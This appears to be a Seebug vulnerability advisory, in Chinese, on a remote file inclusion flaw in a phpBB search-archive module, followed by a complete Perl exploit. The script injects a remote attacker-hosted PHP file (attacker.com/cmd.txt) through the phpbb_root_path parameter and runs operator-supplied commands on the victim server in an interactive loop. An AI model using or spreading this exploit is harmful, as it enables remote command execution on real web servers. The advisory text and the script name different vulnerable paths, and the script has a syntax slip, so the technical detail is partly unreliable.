phpBB Archive for Search Engines模块phpbb_root_path文件包含漏洞

2006-10-25T00:00:00
ID SSV:106
Type seebug
Reporter Root
Modified 2006-10-25T00:00:00

Description

phpBB Archive for Search Engines是phpBB中所使用的搜索模块。

phpBB Archive for Search Engines模块处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意指令。

Archive for Search Engines模块的templates/archive/archive_topic.php脚本没有正确地验证phpbb_root_path参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。

Mambo Power phpBB Archive for Search Engines 我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mambopower.net/downloads/phpbb_searchindexer.zip 

                                        
                                            
                                                    #!/usr/bin/perl

    ###################################################################################### \
    ############### #                                                                     \
    # # pbpbb archive for search engines                                                  \
    # #                                                                                   \
    # # Class:  Remote File Include Vulnerability                                         \
    # #                                                                                   \
    # # Patch:  unavailable                                                               \
    # #                                                                                   \
    # # Date:   2006/10/12                                                                \
    # #                                                                                   \
    # # Remote: Yes                                                                       \
    # #                                                                                   \
    # # Type:   high                                                                      \
    # #                                                                                   \
    # # Site:   http://mambopower.net/       \
    http://www.mambopower.net/downloads/phpbb_searchindexer.zip  # #                      \
    # #################################################################################### \
    #################


    use IO::Socket;
    use LWP::Simple;

    $cmdshell="http://attacker.com/cmd.txt";   # <====== Change This Line With Your \
    Personal Script

    print "\n";
    print "##########################################################################\n";
    print "#                                                                        #\n";
    print "# pbpbb archive for search engines     Remote File Include Vulnerability #\n";
    print "# Bug found By : Ashiyane Corporation                                    #\n";
    print "# Email: nima salehi    nima[at]ashiyane.ir                              #\n";
    print "# Web Site : www.Ashiyane.ir                                             #\n";
    print "#                                                                        #\n";
    print "##########################################################################\n";


    if (@ARGV < 2)
    {
        print "\n Usage: Ashiyane.pl [host] [path] ";
        print "\n EX : Ashiyane.pl www.victim.com /path/  \n\n";
    exit;
    }


    $host=$ARGV[0];
    $path=$ARGV[1];
    $vul="includes/archive/archive_topic.php?phpbb_root_path="

    print "Type Your Commands ( uname -a )\n";
    print "For Exiit Type END\n";

    print "<Shell> ";$cmd = <STDIN>;

    while($cmd !~ "END") {
        $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") \
    or die "Could not connect to host.\n\n";

        print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
        print $socket "Host: ".$host."\r\n";
        print $socket "Accept: */*\r\n";
        print $socket "Connection: close\r\n\n";

        while ($raspuns = <$socket>)
        {
            print $raspuns;
        }

        print "<Shell> ";
        $cmd = <STDIN>;
    }